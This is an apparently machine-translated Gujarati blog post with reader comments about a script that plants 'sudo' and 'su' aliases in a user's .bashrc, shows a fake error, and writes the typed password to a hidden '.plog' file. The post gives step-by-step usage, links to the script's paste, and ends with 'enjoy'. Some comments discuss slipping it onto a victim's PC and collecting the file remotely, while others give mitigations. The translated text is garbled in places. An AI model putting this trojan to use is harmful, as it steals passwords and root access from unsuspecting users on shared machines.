હું "સુડો" અને "સુ" માટે ઉપનામ બનાવતા .bashrc ને બદલવા માટે સ્ક્રિપ્ટ તરફ આવી છું. પછીથી તેને પુનર્સ્થાપિત કરવા માટે ફાઇલનો બેકઅપ લીધા વિના નહીં.
તે શું કરે છે કે તે "sudo" અથવા "su" નો ઉપયોગ કરતી વખતે ભૂલ સંદેશ મોકલે છે અને ".plog" નામના લોગમાં પાસવર્ડ મેળવે છે જે ઘરે છે.
કેવી રીતે વાપરવું
- સ્ક્રિપ્ટ સાચવો
- તેને અમલ કરવાની પરવાનગી આપો.
- તેને ટર્મિનલમાં ચલાવો
- ટર્મિનલ બંધ કરો
- પ્રતીક્ષા કરો.
- પછી .plog ફાઇલ તપાસો. અને રુટ અથવા કેટલાક વપરાશકર્તાનો પાસવર્ડ હોવો જોઈએ જે સુડોર્સમાં હોય.
http://paste.desdelinux.net/4691
આનંદ કરો.
આ લોકો માટે, તે છે કે અમારી ટીમની શારીરિક સુરક્ષાને અવગણવી ન જોઈએ
તે સાચું છે, જો પીસી એક ક્ષણ માટે ધીરે છે, તો તમારે ઉપનામો તપાસવું પડશે 😀
નિર્દોષ પ્રશ્ન:
સ્ક્રિપ્ટ ન -ન-સેલ્ફ સુડોર વપરાશકર્તાના .bashrc ને કેવી રીતે બદલી શકે છે?
ઓઓ મને તે ખરેખર ગમ્યું. પરીક્ષણ.
તેથી સુરક્ષા અને એન્ક્રિપ્શન કે જે આપણે gnu / linux માં વાપરીએ છીએ તે નકામું છે? હું માનું છું કે આ કેસ નથી, જેણે પણ આનો પ્રયાસ કર્યો તે પરિણામો પર ટિપ્પણી કરે. મેં આ સિસ્ટમનો ઉપયોગ કર્યો હોવાથી મેં વાંચ્યું છે કે લિનક્સમાં એન્ક્રિપ્શન સ્તર ખૂબ areંચા છે પાસવર્ડ્સ એક-વે ક્રિપ્ટોગ્રાફિક ઘટાડા એલ્ગોરિધમ્સનો ઉપયોગ કરીને એન્ક્રિપ્ટ કરવામાં આવ્યા છે અને હવે તે બહાર આવ્યું છે કે એક સરળ સ્ક્રિપ્ટ સાથે કે એન્ક્રિપ્શન છોડ્યું નથી. માફ કરશો પણ વિશ્વાસ નથી કરતો.
જો તે કામ કરે છે, તો જુઓ. શું થાય છે કે સ્ક્રિપ્ટ સુડો અને સુ સાથે .bashrc માં ઉપનામ બનાવે છે. અને જ્યારે તમે su અને / અથવા sudo લખો છો. તે પહેલા ઉપનામ વાંચે છે. જેમ કે આદેશ નથી. તેથી જ્યારે તમે પાસવર્ડ લખો ત્યારે તે તેને સામાન્ય ટેક્સ્ટ ફાઇલમાં મૂકે છે. અને પછી તે ઉપનામ કાtesી નાખે છે અને તમને સુડો અથવા સુ સામાન્યનો ઉપયોગ કરવા દે છે. મારો મતલબ કે તે ફિશિંગ જેવું છે. એવું નથી કે તે એન્ક્રિપ્શનને બાયપાસ કરે છે. તે નકલી લ loginગિન છે.
ઠીક છે હવે જો હું સમજી શકું છું, તોરેરેરાની સુરક્ષાને છોડીને મને પહેલેથી જ આશ્ચર્ય થયું હતું .. તે સ્પષ્ટ કરવા બદલ આભાર.
ખાતરી કરો, પરંતુ સૌથી મુશ્કેલ વસ્તુ બાકી છે, સ્ક્રિપ્ટને પીડિતના પીસી પર સ્નીક કરવામાં આવે છે, તેને ચલાવવામાં આવે છે અને પછી ફાઇલને દૂરથી પસંદ કરે છે અથવા તેને ઇમેઇલ પર મોકલવામાં આવે છે. ત્યાં દરેકને તેમની કલ્પનાનો ઉપયોગ કરવો પડશે!
મને લાગે છે કે તમે ઘણા બધા પેકોએલોયોને અતિશયોક્તિ આપી છે. આ એક સરળ ટ્રોજન છે, જેને વપરાશકર્તાને વિવિધ સુરક્ષા પગલાં અને હુમલાખોરની સ્થાનિક હાજરીને બાયપાસ કરવાની જરૂર છે. તે કોઈપણ ઓએસમાં અસ્તિત્વમાં છે.
સ્ક્રિપ્ટ વિશે ... જો હું ભૂલથી નથી, તો મોટાભાગના વર્તમાન એસયુડીઓ રુટ પાસવર્ડને નહીં પણ, વપરાશકર્તાના પાસવર્ડથી પ્રમાણિત કરે છે. તેથી જે પાસવર્ડ પ્રાપ્ત થશે તે વપરાશકર્તાનો છે (સુડોર્સમાં હાજર છે)
સાદર
સુડો અથવા સુ સાથે છે. જો વપરાશકર્તા સુડોનો ઉપયોગ કરી શકે, તો તે એટલા માટે છે કે તે સુડોર્સમાં છે અને તે જ રૂટ જેવા સગવડ ધરાવે છે .. અથવા નથી?
હંમેશાં નહીં, તે સુડોર્સ ગોઠવણી પર આધારિત છે. તો પણ, સૌથી સામાન્ય છે કે હા, તમારી પાસે સંપૂર્ણ .ક્સેસ છે.
મુદ્દો એ છે કે સુડોનો ઉપયોગ કરીને કરવામાં આવતી ક્રિયાઓ સામાન્ય રીતે લ loggedગ કરે છે
ફક્ત "su" ને પ્રેરિત કરવાથી તમે રૂટ ખાતામાં પ્રવેશ મેળવી શકો છો.
જો તમે શેર કરેલા વર્ગખંડ અથવા વર્કશોપ વાતાવરણમાં સારા પાસવર્ડ્સનો ઉપયોગ કરો છો તો આ ખૂબ જ જોખમી છે. તેઓ તમારા માટે તે રમી શકે છે. ઠીક છે, તેઓ તેને રમી શક્યા હોત ...
કોઈ અજાણ્યા વ્યક્તિના પાસવર્ડ્સ શોધવા માટે તે ઉપયોગી નથી, પરંતુ મને લાગે છે કે કોઈ પરિચિતનું પૂરતું છે.
અને યાદ રાખો, મોટાભાગના તેમના પાસવર્ડ્સની નકલ કરો અથવા સામાન્ય દાખલાઓનો ઉપયોગ કરો. તેમને ક્યારેય ઓછો અંદાજ ન આપો. જો તમે અલબત્ત ખૂબ જ હાસ્યાસ્પદ છો ...
ઠીક છે, હું આજુબાજુમાં ગડબડ કરતો નથી ... મારી પાસે છુપાવવા માટે કંઈ નથી, અંતિમ પરીક્ષાના પ્રશ્નો પણ નથી ... અને જો મને પાસવર્ડની જરૂર હોય, તો હું તે પૂછું છું ... અને મારી પાસે મારી ફાઇલો બાહ્ય હાર્ડ ડ્રાઇવ પર છે. .. મારા લેપટોપ પર બેકઅપ સાથે જે હાઉસ પર રહે છે.
તમારે સાદગી અને વ્યવહારિકતા જોવી પડશે, આજે હું કાલે જીવિત છું મને ખબર નથી ... હું આજે જીવી રહ્યો છું બાકીનો ઓવરટાઇમ છે.
હું તેને ધ્યાનમાં રાખીશ, આભાર.
રસપ્રદ!
આ સ્ક્રિપ્ટ સુડર વપરાશકર્તાના .bashrc માં પોતાને કેવી રીતે ક copyપિ કરે છે?
જો તમારું કમ્પ્યુટર પર એકાઉન્ટ છે, તો જ્યાં સુધી તમારી પાસે પરવાનગી ન હોય ત્યાં સુધી તમે બીજા વપરાશકર્તાના ઘરે પ્રવેશ કરી શકતા નથી અને મને હજી પણ શંકા છે કે તમે પીડિતાના .bashrc ને સંશોધિત કરી શકો છો.
મને ખૂબ શંકા છે કે જ્યાં સુધી સુડોર વપરાશકર્તા અત્યંત બેદરકાર ન હોય ત્યાં સુધી તે કામ કરશે.
આપણે આ હવામાન સાથે ખૂબ કાળજી લેવી પડશે!
એક પ્રશ્ન, જો મારી પાસે રુટ પાસવર્ડ નથી, તો હું ફાઇલ એક્ઝેક્યુશનની પરવાનગી કેવી રીતે આપી શકું? અથવા સામાન્ય વપરાશકર્તા કામ કરે છે?
શ્યોર એક્ઝેક્યુટ પરમિશન રુટ માટે વિશિષ્ટ નથી.
મદદ!
પ્રયાસ કર્યા પછી, મેં .sudo_sd કા deletedી નાખી છે અને ગૂગલ (અથવા અન્ય સર્ચ એન્જિન) માં કંઈપણ શોધી શક્યું નથી.
મેં .plog ને કા deletedી નાખી અને તે આપમેળે કા deletedી નાખવામાં આવ્યું .સુડો_એસડી અને હું રૂટ તરીકે લ inગ ઇન કરી શકતો નથી
ઉપનામો પર ટિપ્પણી દ્વારા સ્થિર
જો આ મેક પર કામ કરે છે, તો હું Appleપલ સ્ટોરને ટ્રોલ કરતી જઈશ… અરે! પરંતુ માત્ર થોડો, આતંકવાદી યોજનામાં નહીં
રસપ્રદ પ્રવેશ
એક શંકા
અને જો હું gdeu અથવા kde માં સમકક્ષ વાપરો
તે પાસવર્ડ પણ મેળવે છે
સાદર
.Bashrc ને ફક્ત વાંચવા માટેની પરવાનગી આપીને આ સ્ક્રિપ્ટનું અમલીકરણ ટાળી શકાય છે
પરીક્ષણ કર્યું, તે કાર્ય કરે છે, અનકની તેની મર્યાદાઓ છે. તમે હંમેશાં લિનક્સમાં નવી વસ્તુઓ શીખશો.
એકવાર કરેલા ફેરફારો હું કેવી રીતે પાછું કરી શકું? મેં .plog ને કા deletedી નાખ્યું છે અને તે મને સુડો વાપરવા નહીં દે:
bash: /home/alberto/.sudo_sd: ફાઇલ અથવા ડિરેક્ટરી અસ્તિત્વમાં નથી
ઉપનામો પર ટિપ્પણી દ્વારા સ્થિર